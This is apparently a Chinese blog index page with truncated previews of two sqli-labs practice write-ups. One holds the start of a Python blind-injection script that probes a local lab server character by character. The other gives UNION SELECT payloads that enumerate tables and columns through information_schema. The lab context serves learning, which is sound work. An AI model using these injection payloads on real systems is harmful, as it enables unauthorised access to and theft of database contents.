sqlilab
关注
分享
扫一扫
胖鸟飞不动
这个作者很懒,什么都没留下…
展开
-
【sqli-lab】less8 (条件式相应)
尝试用下for与while两个循环。import requests as rimport refuzzing = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "."]pattern = "you are in"sqlversion = ""for k in range(1, 10): for i in range(len(fuzzing)): url = "http://10.10.10.138:10000/Le原创 2021-06-23 21:33:38 · 155 阅读 · 0 评论 -
sqlilab(1-4)
注入方法差不多,第一题添加单引号会报错;第二题需要将单引号编码第三题,报错后会发现有个右括号。union select null,table_name,null from information_schema.tables where table_schema = 'security' limit x,1 -- -通过控制x参数获取security中有几张表union select null,column_name,null from information_schema.columns wh原创 2021-05-26 23:15:56 · 147 阅读 · 0 评论